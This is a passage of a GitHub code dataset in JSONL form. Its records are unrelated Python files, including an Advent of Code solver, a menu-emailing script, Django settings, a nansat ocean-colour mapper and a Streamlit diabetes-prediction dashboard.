', move)\n\n\nwhile True:\n \n window.update()\n\n","repo_name":"flosthch/flosthch.github.io","sub_path":"My/trojanischer_krieg/animi.py","file_name":"animi.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23385570389","text":"import pytest\n\n\n@pytest.mark.parametrize(\"mass, fuel\", [\n (12, 2),\n (14, 2),\n (1969, 654),\n (100756, 33583),\n (2, 0),\n])\ndef test_required_fuel(mass, fuel):\n assert required_fuel(mass) == fuel\n\n\ndef required_fuel(mass):\n return max(0, mass // 3 - 2)\n\n\ndef part1(values):\n return sum(required_fuel(mass) for mass in values)\n\n\n@pytest.mark.parametrize(\"mass, fuel\", [\n (14, 2),\n (1969, 966),\n (100756, 50346),\n])\ndef test_required_fuel_taking_fuel_mass_into_account(mass, fuel):\n assert required_fuel_taking_fuel_mass_into_account(mass) == fuel\n\n\ndef required_fuel_taking_fuel_mass_into_account(mass):\n extra_mass = []\n while True:\n mass = required_fuel(mass)\n if mass == 0:\n break\n extra_mass.append(mass)\n return sum(extra_mass)\n\n\ndef part2(values):\n return sum(required_fuel_taking_fuel_mass_into_account(mass) for mass in values)\n\n\nif __name__ == '__main__':\n with open(\"day01.txt\") as file_:\n values = [int(line) for line in file_]\n print(\"Part 1:\", part1(values))\n print(\"Part 2:\", part2(values))\n","repo_name":"ronnix/jeux-de-programmation","sub_path":"04-advent-of-code-2019/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"30980895617","text":"import datetime as dt\nimport time\nimport smtplib\nimport requests\nfrom bs4 import BeautifulSoup\nfrom unicodedata import normalize\nwhile True:\n url = 'https://wlu.campusdish.com/en/LocationsAndMenus/FreshFoodCompany'\n ffc_r = requests.get(url)\n ffc_soup = BeautifulSoup(ffc_r.text, 'html.parser')\n all = ffc_soup.findAll('a', attrs={'class':'viewItem'})\n list_menu = \"\"\n for name in ffc_soup.findAll('a', attrs={'class':'viewItem'}):\n list_menu = list_menu + str(name.text) + \", \"\n email_user = \"*EMAIL GOES HERE*\"\n server = smtplib.SMTP (\"smtp.gmail.com\", 587) \n server.ehlo()\n server.starttls()\n server.login('#EMAILGOES HERE#', '#PASSWORD GOES HERE')\n message = normalize('NFKD', list_menu).encode('ASCII', 'ignore')\n server.sendmail(email_user, email_user, message)\n server.quit()\n time.sleep(60*360)\n \n\n","repo_name":"Arnav1200/Dining-Hall-Menu-Notifier","sub_path":"notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28157474307","text":"from flask import Blueprint, jsonify, request\n\nrecommendations_bp = Blueprint('recommendations', __name__)\n\ndocuments = [\n {'id': 1, 'title': 'Introduction to Machine Learning', 'author': 'John Smith', 'content': 'Machine learning is a subfield of artificial intelligence...'},\n {'id': 2, 'title': 'Quantum Computing: A Brief Overview', 'author': 'Jane Doe', 'content': 'Quantum computing is an emerging field...'},\n {'id': 3, 'title': 'The CRISPR Revolution', 'author': 'Bob Johnson', 'content': 'CRISPR is a revolutionary gene-editing technology...'},\n]\n\n# API to generate recommended similar documents based on a document sent in the POST request\n@recommendations_bp.route('/', methods=['POST'])\ndef generate_recommendations():\n document = request.json\n # Example recommendation generation algorithm\n recommendations = [d for d in documents if d['author'] == document['author'] and d['id'] != document['id']]\n return jsonify({'recommendations': recommendations}), 200\n\n# API to retrieve the recommended similar documents generated by the previous API\n@recommendations_bp.route('/', methods=['GET'])\ndef get_recommendations():\n # Example of how to retrieve previously generated recommendations\n recommendations = [{'id': 2, 'title': 'Quantum Computing: A Brief Overview', 'author': 'Jane Doe', 'content': 'Quantum computing is an emerging field...'},\n {'id': 3, 'title': 'The CRISPR Revolution', 'author': 'Bob Johnson', 'content': 'CRISPR is a revolutionary gene-editing technology...'}]\n return jsonify({'recommendations': recommendations}), 200\n","repo_name":"barotjay998/game-of-papers","sub_path":"app/api/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27056836598","text":"import os.path\n\nfrom configurations import Configuration, values\n\n\nclass Common(Configuration):\n\n VERSION = values.Value('0.0.0-x', environ_prefix='ID')\n SITE_NAME = values.Value('OCCRP ID', environ_prefix='ID')\n\n INSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.auth',\n 'django.contrib.sessions',\n\n # Third party apps\n 'rest_framework',\n 'corsheaders',\n 'django_filters',\n 'social_django',\n 'activity',\n 'djmoney',\n 'django_bleach',\n\n # Your apps\n 'api_v3',\n\n )\n\n MIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n )\n\n ALLOWED_HOSTS = [\"*\"]\n ROOT_URLCONF = 'api_v3.urls'\n SECRET_KEY = values.SecretValue()\n WSGI_APPLICATION = 'api_v3.wsgi.application'\n USE_X_FORWARDED_HOST = True\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n SESSION_COOKIE_SECURE = True\n\n ROUTER_CLASS = 'rest_framework.routers.DefaultRouter'\n\n # Email, defaults to in-memory backend, switch to `console` for development\n EMAIL = values.EmailURLValue('locmem://')\n DEFAULT_FROM_EMAIL = values.EmailValue(\n '', environ_prefix='ID', environ_required=True)\n DEFAULT_FROM = '{} <{}>'.format(SITE_NAME, DEFAULT_FROM_EMAIL)\n DEFAULT_NOTIFY_EMAILS = values.ListValue([], environ_prefix='ID')\n\n ADMINS = []\n\n # Postgres\n DATABASES = values.DatabaseURLValue(\n 'postgres://postgres:postgres@postgres:5432/postgres')\n QUEUE_DATABASE_URL = values.Value(\n 'postgres://postgres:postgres@postgres:5432/postgres',\n environ_name='QUEUE_DATABASE_URL', environ_prefix='')\n\n # CORS\n CORS_ALLOW_CREDENTIALS = True\n CORS_ORIGIN_WHITELIST = values.ListValue(['http://localhost:8000'])\n CORS_ORIGIN_ALLOW_ALL = values.BooleanValue(False)\n\n # Misc\n EXPENSE_SCOPES = values.ListValue([], environ_prefix='ID')\n MEMBER_CENTERS = values.ListValue([], environ_prefix='ID')\n\n # General\n APPEND_SLASH = False\n TIME_ZONE = 'UTC'\n LANGUAGE_CODE = 'en-us'\n # If you set this to False, Django will make some optimizations so as not\n # to load the internationalization machinery.\n USE_I18N = False\n USE_L10N = False\n USE_TZ = False\n\n # Sanitization\n BLEACH_ALLOWED_TAGS = []\n BLEACH_ALLOWED_ATTRIBUTES = []\n BLEACH_STRIP_TAGS = True\n BLEACH_STRIP_COMMENTS = True\n\n # Media files: max. size of 500MB\n MEDIA_ROOT = values.Value(\n environ_name='MEDIA_ROOT', environ_prefix='', environ_required=True)\n MAX_UPLOAD_SIZE = 1024 * 1024 * 500\n STATIC_URL = '/api/static/'\n\n DEBUG = values.BooleanValue(False)\n\n TEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'DIRS': [\n os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', 'templates')\n ),\n ],\n },\n ]\n\n # Logging\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n }\n\n # Custom user app\n AUTH_USER_MODEL = 'api_v3.Profile'\n\n # Authentication\n AUTHENTICATION_BACKENDS = values.ListValue(\n [\n 'api_v3.misc.oauth2.KeycloakOAuth2',\n ]\n )\n SOCIAL_AUTH_KEYCLOAK_BASE = values.Value('', environ_prefix='')\n SOCIAL_AUTH_KEYCLOAK_KEY = values.Value('', environ_prefix='')\n SOCIAL_AUTH_KEYCLOAK_SECRET = values.Value('', environ_prefix='')\n SOCIAL_AUTH_NO_DEFAULT_PROTECTED_USER_FIELDS = values.BooleanValue(\n True, environ_prefix='')\n SOCIAL_AUTH_PROTECTED_USER_FIELDS = values.ListValue([], environ_prefix='')\n\n SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = values.Value('', environ_prefix='')\n SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = values.Value('', environ_prefix='')\n\n # Username is not used.\n SOCIAL_AUTH_USER_FIELDS = ['email']\n\n # See: http://python-social-auth.readthedocs.io/en/latest/pipeline.html\n SOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.user.user_details',\n 'api_v3.misc.oauth2.activate_user',\n 'api_v3.misc.oauth2.map_email_to_subscriber',\n )\n\n # Django Rest Framework\n REST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.IsAuthenticated',\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.SessionAuthentication',\n )\n }\n\n # JSON API DRF\n JSON_API_FORMAT_FIELD_NAMES = 'dasherize'\n JSON_API_FORMAT_TYPES = 'dasherize'\n JSON_API_PLURALIZE_TYPES = True\n\n # Default job queue name\n QUEUE_NAME = values.Value('default', environ_prefix='')\n\n # Allows disabling the review emails\n REVIEWS_DISABLED = values.BooleanValue(False, environ_prefix='ID')\n","repo_name":"occrp/id-backend","sub_path":"api_v3/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"44037007053","text":"import random\nimport sys\nimport math\n\n\ndef chooseItemFromNamedList(list, prompt):\n print(prompt)\n counter = 0\n for item in list:\n counter += 1\n print(str(counter) + \":\" + item.name)\n c = getInt(\"Choice: \", list.__len__())\n return list[c-1]\n\n\ndef getInt(prompt, max, min=1):\n while True:\n try:\n i = int(input(prompt))\n if max >= i >= min:\n return i\n else:\n print(\"Too small/Too big\")\n\n except:\n print(\"It must be an integer\")\n\n\ndef getFloat(prompt, max, min):\n while True:\n try:\n i = float(input(prompt))\n if max >= i >= min:\n return i\n else:\n print(\"Too small/Too big\")\n except:\n print(\"It must be a number\")\n\n\ndef getLetters(prompt):\n i = str(input(prompt))\n return i\n","repo_name":"Ccdiaz09/Hopeful","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"6214310535","text":"from dataset import folder_generator\nimport pandas as pd\nimport re\n\n\ndef create_methylation_dataset(folders, islands=None, filters=dict()):\n \"\"\"\n The function creates a pandas Dataframe where each row is a sample and each column is a CpG island. Only the islands\n passed as parameter are considered.\n :param folders: a list of string containing the folders where the files are\n :param islands: a list of CpG island\n :param filters: a dict where the key is the column and the value the value used to filter\n :return: a pandas Dataframe\n \"\"\"\n for path in folder_generator(folders, r'^jhu-usc\\..+txt$'):\n dataset = pd.read_csv(path, sep='\\t', na_values=\"NA\", index_col=0)\n dataset.dropna()\n if islands is not None:\n dataset = dataset.loc[islands]\n for col, value in filters.items():\n dataset = dataset[dataset[col] == value]\n filtered_islands = list(dataset.index.values)\n break\n\n new_dataset = pd.DataFrame(columns=filtered_islands+[\"barcode\"])\n count = 0\n for path in folder_generator(folders, r'^jhu-usc\\..+txt$'):\n try:\n dataset = pd.read_csv(path, sep='\\t', na_values=\"NA\", index_col=0)\n dataset = dataset[[\"Beta_value\"]].loc[filtered_islands].T.reset_index().drop(\"index\", axis=1)\n dataset.columns.name = None\n barcode = re.search(r'TCGA-[A-Z0-9]{2}-[A-Z0-9]{4}-[A-Z0-9]{3}-[A-Z0-9]{3}-[A-Z0-9]{4}-[A-Z0-9]{2}', path).group()\n dataset[\"barcode\"] = barcode\n new_dataset = new_dataset.append(dataset)\n count += 1\n print(count)\n except KeyError:\n print(\"Skipping file\")\n new_dataset = new_dataset.set_index(\"barcode\")\n print(new_dataset)\n new_dataset = new_dataset.dropna(axis=1)\n print()\n print(new_dataset)\n return new_dataset\n","repo_name":"TestaDiRapa/asimov","sub_path":"dataset/methylation450.py","file_name":"methylation450.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16033730519","text":"from pylibdmtx.pylibdmtx import decode\nfrom PIL import Image\nimport os\n\n\ndef get_barcode_info(picture_obj):\n\n\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n picture_path = BASE_DIR + os.path.normpath(picture_obj.image.url)\n result = decode(Image.open(picture_path))\n\n try:\n decode_data = str(result[0].data.decode('UTF-8'))\n return decode_data, picture_path\n\n except IndexError:\n return None, None\n","repo_name":"CesarRodriguezPro/InternationalConcreteTools","sub_path":"tools/data_processing/barcode_scanner.py","file_name":"barcode_scanner.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33342357978","text":"# Name: mapper_obpg_l3\n# Purpose: Mapping for L3 data from the OBPG web-site\n# Authors: Anton Korosov\n# Licence: This file is part of NANSAT. You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\nimport datetime\nimport os.path\nimport glob\n\nimport numpy as np\n\nfrom nansat.utils import gdal, ogr\nfrom nansat.vrt import VRT\nfrom nansat.nsr import NSR\n\nfrom nansat.exceptions import WrongMapperError\n\nclass Mapper(VRT):\n ''' Mapper for Level-3 Standard Mapped Image from\n http://oceancolor.gsfc.nasa.gov'''\n\n # detect wkv from metadata 'Parameter'\n param2wkv = {'Chlorophyll a concentration': 'mass_concentration_of_chlorophyll_a_in_sea_water',\n 'Diffuse attenuation coefficient': 'volume_attenuation_coefficient_of_downwelling_'\n 'radiative_flux_in_sea_water',\n 'Remote sensing reflectance': 'surface_ratio_of_upwelling_radiance_emerging_from_'\n 'sea_water_to_downwelling_radiative_flux_in_air',\n 'CDOM Index': 'volume_absorption_coefficient_of_radiative_flux_in_sea_water_due_'\n 'to_dissolved_organic_matter',\n 'Sea Surface Salinity': 'sea_surface_salinity',\n 'Sea Surface Temperature': 'sea_surface_temperature',\n 'Instantaneous Photosynthetically Available Radiation': 'instantaneous_photosynthetically_available_radiation',\n 'Particle backscatter at 443 nm': 'volume_backscattering_coefficient_of_radiative_flux_in_sea_water_due_to_suspended_particles',\n 'Chlorophyll a concentration, Garver-Siegel-Maritorena Model': 'mass_concentration_of_chlorophyll_a_in_sea_water',\n 'Photosynthetically Available Radiation': 'downwelling_photosynthetic_photon_radiance_in_sea_water',\n 'Instantaneous Photosynthetically Available Radiation': 'instantaneous_downwelling_photosynthetic_photon_radiance_in_sea_water',\n }\n\n def __init__(self, filename, gdalDataset, gdalMetadata, **kwargs):\n ''' OBPG L3 VRT '''\n\n try:\n assert 'Level-3 Standard Mapped Image' in gdalMetadata['Title']\n except:\n raise WrongMapperError\n\n # get list of similar (same date) files in the directory\n iDir, iFile = os.path.split(filename)\n iFileName, iFileExt = os.path.splitext(iFile)\n simFilesMask = os.path.join(iDir, iFileName)\n simFiles = glob.glob(simFilesMask + iFileExt[0:6] + '*')\n #print 'simFilesMask, simFiles', simFilesMask, simFiles\n\n metaDict = []\n for simFile in simFiles:\n #print 'simFile', simFile\n # open file, get metadata and get parameter name\n simSupDataset = gdal.Open(simFile)\n if simSupDataset is None:\n # skip this similar file\n #print 'No dataset: %s not a supported SMI file' % simFile\n continue\n # get subdatasets from the similar file\n simSubDatasets = simSupDataset.GetSubDatasets()\n if len(simSubDatasets) > 0:\n for simSubDataset in simSubDatasets:\n #print 'simSubDataset', simSubDataset\n if 'l3m_data' in simSubDataset[1]:\n # get SourceFilename from subdataset\n tmpSourceFilename = simSubDataset[0]\n break\n else:\n # get SourceFilename from dataset\n tmpSourceFilename = simFile\n\n # open subdataset with GDAL\n #print 'tmpSourceFilename', tmpSourceFilename\n tmpGdalDataset = gdal.Open(tmpSourceFilename)\n\n try:\n # get metadata, get 'Parameter'\n tmpGdalMetadata = tmpGdalDataset.GetMetadata()\n simParameter = tmpGdalMetadata['Parameter']\n except:\n print('No parameter: %s not a supported SMI file')\n continue\n else:\n # set params of the similar file\n simSourceFilename = tmpSourceFilename\n simGdalDataset = tmpGdalDataset\n simGdalMetadata = tmpGdalMetadata\n\n # get WKV from the similar file\n #print 'simParameter', simParameter\n for param in self.param2wkv:\n #print 'param', param\n if param in simParameter:\n simWKV = self.param2wkv[param]\n break\n\n # generate entry to metaDict\n metaEntry = {'src': {'SourceFilename': simSourceFilename,\n 'SourceBand': 1,\n 'ScaleRatio': float(simGdalMetadata['Slope']),\n 'ScaleOffset': float(simGdalMetadata['Intercept'])},\n 'dst': {'wkv': simWKV}}\n\n # add wavelength and BandName\n if ' at ' in simParameter and ' nm' in simParameter:\n simWavelength = simParameter.split(' at ')[1].split(' nm')[0]\n metaEntry['dst']['suffix'] = simWavelength\n metaEntry['dst']['wavelength'] = simWavelength\n\n # add band with Rrsw\n metaEntry2 = None\n if simWKV == 'surface_ratio_of_upwelling_radiance_emerging_from_sea_water_to_downwelling_radiative_flux_in_air':\n metaEntry2 = {'src': [metaEntry['src']]}\n metaEntry2['dst'] = {'wkv': 'surface_ratio_of_upwelling_radiance_emerging_from_sea_water_to_downwelling_radiative_flux_in_water',\n 'suffix': simWavelength,\n 'wavelength': simWavelength,\n 'PixelFunctionType': 'NormReflectanceToRemSensReflectance',\n }\n\n # append entry to metaDict\n metaDict.append(metaEntry)\n if metaEntry2 is not None:\n metaDict.append(metaEntry2)\n\n #get array with data and make 'mask'\n a = simGdalDataset.ReadAsArray()\n mask = np.zeros(a.shape, 'uint8') + 64\n mask[a < -32000] = 1\n self.band_vrts = {'mask': VRT(array=mask)}\n\n metaDict.append(\n {'src': {'SourceFilename': self.band_vrts['mask'].filename,\n 'SourceBand': 1},\n 'dst': {'name': 'mask'}})\n\n # create empty VRT dataset with geolocation only\n # print 'simGdalMetadata', simGdalMetadata\n latitudeStep = float(simGdalMetadata.\n get('Latitude Step',\n simGdalMetadata.get('Latitude_Step', 1)))\n longitudeStep = float(simGdalMetadata.\n get('Longitude Step',\n simGdalMetadata.get('Longitude_Step', 1)))\n numberOfColumns = int(simGdalMetadata.\n get('Number of Columns',\n simGdalMetadata.get('Number_of_Columns', 1)))\n numberOfLines = int(simGdalMetadata.\n get('Number of Lines',\n simGdalMetadata.get('Number_of_Lines', 1)))\n #longitudeStep = float(simGdalMetadata['Longitude Step'])\n # x_size, y_size, geo_transform, projection, gcps=None, gcp_projection='', **kwargs\n self._init_from_dataset_params(numberOfColumns, numberOfLines,\n (-180.0, longitudeStep, 0.0, 90.0, 0.0, -longitudeStep),\n NSR().wkt)\n\n # add bands with metadata and corresponding values to the empty VRT\n self.create_bands(metaDict)\n\n # Add valid time\n startYear = int(simGdalMetadata.get('Start Year',\n simGdalMetadata.\n get('Start_Year', 1)))\n startDay = int(simGdalMetadata.get('Start Day',\n simGdalMetadata.\n get('Start)Day', 1)))\n self.dataset.SetMetadataItem('time_coverage_start',\n (datetime.datetime(startYear, 1, 1) +\n datetime.timedelta(startDay)).isoformat())\n","repo_name":"nansencenter/nansat","sub_path":"nansat/mappers/mapper_obpg_l3.py","file_name":"mapper_obpg_l3.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"}
+{"seq_id":"38543932834","text":"import streamlit as st\nimport pandas as pd\nimport altair as alt\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nst.set_page_config(layout='wide',page_title='Prediksi Diagnostik Penyakit Diabetes')\n\ndf = pd.read_csv('https://docs.google.com/spreadsheets/d/e/2PACX-1vRW-2rCgMoo9glcRfoAAZHUIgQpyb4sXv9DATBsQoihLtBbCo-p_BUwfrNcaq8OCCOe2ZhS0mVOvkR-/pub?gid=1879661496&single=true&output=csv')\n\n#########################################################################\n#DATA PREPROCESSING\n\n#Handling Outlier\ndf['Pregnancies']=df.Pregnancies.mask(df.Pregnancies == 0, df['Pregnancies'].mean())\ndf['Pregnancies']=df.Pregnancies.mask(df.Pregnancies > 12, df['Pregnancies'].mean())\ndf['Glucose']=df.Glucose.mask(df.Glucose == 0, df['Glucose'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure == 0, df['BloodPressure'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure < 40, df['BloodPressure'].mean())\ndf['BloodPressure']=df.BloodPressure.mask(df.BloodPressure > 105, df['BloodPressure'].mean())\ndf['BMI']=df.BMI.mask(df.BMI == 0, df['BMI'].mean())\ndf['BMI']=df.BMI.mask(df.BMI > 48, df['BMI'].mean())\n\n#Select column based on correlation\ndf = df.drop(['SkinThickness','Insulin','BloodPressure','DiabetesPedigreeFunction'],axis=1)\n\n#machinelearning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\ny = df.iloc[:,-1]\nx = df.iloc[:,0:-1]\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2,train_size=0.8,random_state=0)\n#Logistic Regression\nlr = LogisticRegression()\nlr.fit(x_train,y_train)\ny_pred_lr = lr.predict(x_test)\n#########################################################################\n#FRONTEND\n\nst.title('Prediksi Diagnostik Penyakit Diabetes')\n\naboutdata=(\"\"\"\n \n Kumpulan data ini berasal dari National Institute of Diabetes and Digestive and Kidney Diseases . Tujuan dari kumpulan data ini adalah untuk memprediksi secara diagnostik apakah seorang pasien menderita diabetes, berdasarkan pengukuran diagnostik tertentu yang termasuk dalam kumpulan data. 2 Dari kumpulan data dalam File (.csv) dapat ditemukan beberapa variabel, beberapa di antaranya independent (beberapa variabel prediktor medis) dan hanya satu variabel dependent target (Hasil/Outcome ).\n
\n\"\"\")\n\nlatarbelakang = (\"\"\"\n \n Penyakit diabetes memiliki urgensi yang tinggi di Indonesia. Berdasarkan data dari Kementerian Kesehatan Indonesia pada tahun 2020, prevalensi diabetes di Indonesia terus mengalami peningkatan yang signifikan. Berikut adalah beberapa statistik terkait urgensi penyakit diabetes di Indonesia : \n \n - Prevalensi Diabetes: Menurut data Riskesdas 2018 (Riset Kesehatan Dasar), prevalensi diabetes di Indonesia pada tahun tersebut adalah sekitar 10,7% . Artinya, sekitar 10,7 dari 100 orang di Indonesia memiliki diabetes . \n \n - Jumlah Penderita Diabetes: Diperkirakan ada sekitar 10-11 juta orang di Indonesia yang telah didiagnosis menderita diabetes. Namun, terdapat juga banyak kasus diabetes yang belum terdiagnosis atau belum diketahui .\n
\n\"\"\")\n\nlatbel, tendat = st.columns(2)\n\nwith latbel:\n st.header('Tentang Data')\n st.write(aboutdata, unsafe_allow_html=True)\nwith tendat:\n st.header('Latar Belakang')\n st.write(latarbelakang, unsafe_allow_html=True)\n\nst.header('Data Insight')\ndatafram, corrcol = st.columns(2)\nwith datafram:\n st.dataframe(df, use_container_width=True)\nwith corrcol:\n fig, ax = plt.subplots(figsize=(5,2.5))\n sns.heatmap(df.corr(), annot=True)\n st.pyplot(fig,use_container_width=True)\n\ndiabetespositive = df['Outcome'].loc[df['Outcome'] == 1].count()\npercpositive = df['Outcome'].loc[df['Outcome'] == 1].count()/df['Outcome'].count()\ndiabetesnegative = df['Outcome'].loc[df['Outcome'] == 0].count()\npercnegative = df['Outcome'].loc[df['Outcome'] == 0].count()/df['Outcome'].count()\n\nmodemode = df.loc[df['Outcome'] == 1]\nmodeage = modemode['Age'].mode().values[0]\n\nmx_positive, mx_negative, mx_age = st.columns(3)\n\nwith mx_positive:\n st.metric(\n \"Positif Diabetes (Jumlah)\",\n value= diabetespositive\n )\nwith mx_negative:\n st.metric(\n \"Negatif Diabetes (Jumlah)\",\n value= diabetesnegative\n )\nwith mx_age:\n st.metric(\n \"Umur dominan penderita diabetes\",\n value= f'{modeage} Tahun'\n )\n\nfakta = (\"\"\"\n \n Fakta : Berdasarkan heatmap korelasi di atas, Atribut yang paling berpengaruh dalam proses pembuatan proyek ini adalah atribut Glukosa yang artinya Glukosa merupakan faktor utama penyebab Diabetes itu sendiri. \n
\n\"\"\")\n\nst.write(fakta,unsafe_allow_html=True)\n\nst.header('Grafik Penderita Diabetes')\n\nagecount = df.groupby(['Age','Outcome']).size().reset_index(name='count')\nagecount['Outcome'] = agecount['Outcome'].replace(0,'Negative').replace(1,'Positive')\ncustom_colors = alt.Scale(domain=['Negative', 'Positive'], range=['#38B000', '#E63946'])\n\ndiabetesbar = alt.Chart(agecount).mark_bar().encode(\n alt.X('Age',title=\"Age\"),\n alt.Y('count',title='Amount'),\n alt.Color('Outcome',scale=custom_colors),\n )\n\nst.altair_chart(diabetesbar, use_container_width=True)\n\nst.header('Grafik Status Diabetes per Umur')\n\nages = df['Age'].unique()\n\nageselect = st.selectbox(\"Umur (berdasarkan data yang ada di database)\",sorted(ages))\n\nbasedperage = agecount.loc[agecount['Age'] == int(ageselect)]\n\ndiabetesbarperage = alt.Chart(basedperage).mark_bar().encode(\n alt.X('Age',title=\"Age\"),\n alt.Y('count',title='Amount'),\n alt.Color('Outcome',scale=custom_colors),\n alt.Column('Outcome', header=alt.Header(title='Outcome'))\n ).properties(\n width=100,\n height=200\n )\n\nst.altair_chart(diabetesbarperage)\n\ntool, insight = st.columns(2)\n\nwith tool :\n st.header('Alat Pendeteksi Diabetes (Diagnostik)')\n\n import numpy as np\n preg = st.number_input('Berapa kali hamil : ', 0,20)\n glu = st.number_input('Level glukosa dalam darah : ',0,300)\n bmi = st.number_input('Indeks Massa Tubuh (IMT) : ',0,50)\n age = st.number_input('Umur : ',0,120)\n\n negatif = (\"\"\"\n \n Anda NEGATIF mengalami penyakit Diabetes\n
\n \"\"\")\n positif = (\"\"\"\n \n Anda POSITIF mengalami penyakit Diabetes\n
\n \"\"\")\n\n try:\n pregt = float(preg)\n glut = float(glu)\n bmit = float(bmi)\n aget = int(age)\n demo = np.array([pregt,glut,bmit,aget])\n demo = demo.reshape(1,-1)\n pred = lr.predict(demo)\n pred = pred.reshape(-1,1)\n if st.button('Enter') : \n if pred[0] == 0:\n st.write(negatif,unsafe_allow_html=True)\n elif pred[0] == 1:\n st.write(positif,unsafe_allow_html=True)\n else:\n st.write('')\n except ValueError:\n st.write(\"Harap memberikan data secara tepat!\")\n\n from sklearn.metrics import accuracy_score\n\n st.write(\"Akurasi Model (Logistic Regression) :\\n\",round(accuracy_score(y_test,y_pred_lr),2))\n\n caption = (\"\"\"\n \n Penting! : Model ini adalah alat DIAGNOSTIK untuk mendeteksi diabetes saja. Disarankan untuk berkonsultasi ke dokter untuk mendapatkan hasil yang lebih akurat. \n
\n \"\"\")\n\n st.caption(caption,unsafe_allow_html=True)\nwith insight :\n st.header('Nilai Sehat')\n caption2 = (\"\"\"\n \n Berikut merupakan nilai normal dari atribut pemicu diabetes yang perlu diperhatikan agar tidak terkena penyakit diabetes. \n\n NILAI DI BAWAH INI BERDASARKAN DATA YANG ADA PADA DATABASE \n
\n \"\"\")\n avgglu = round(df['Glucose'].loc[df['Outcome'] == 0].mean(),2)\n avgBMI = round(df['BMI'].loc[df['Outcome'] == 0].mean(),2)\n avgpreg = round(df['Pregnancies'].loc[df['Outcome'] == 0].mean())\n nilainormal = (f\"\"\"\n \n Glukosa : {avgglu} \n \n Indeks Massa Tubuh : {avgBMI} \n \n Jumlah Kehamilan : {avgpreg} kali \n
\n \"\"\")\n st.caption(caption2,unsafe_allow_html=True)\n st.write (nilainormal,unsafe_allow_html=True)\n","repo_name":"barjej/diabetespred","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23559578481","text":"#!/usr/bin/env python3\n\nimport sys\n\n\ndef is_tidy(n):\n prev = -1\n for c in map(int, str(n)):\n if c < prev:\n return False\n prev = c\n return True\n\n\ndef solve(N):\n for n in range(N, -1, -1):\n if is_tidy(n):\n return n\n assert(False)\n\n\nif __name__ == \"__main__\":\n input_filepath = sys.argv[1]\n\n with open(input_filepath, \"rt\") as input_file:\n T = int(next(input_file))\n\n for i in range(1, T + 1):\n N = int(next(input_file))\n print(\"Case #%u: %s\" % (i, solve(N)))\n\n assert(i == T)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3769.py","file_name":"3769.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
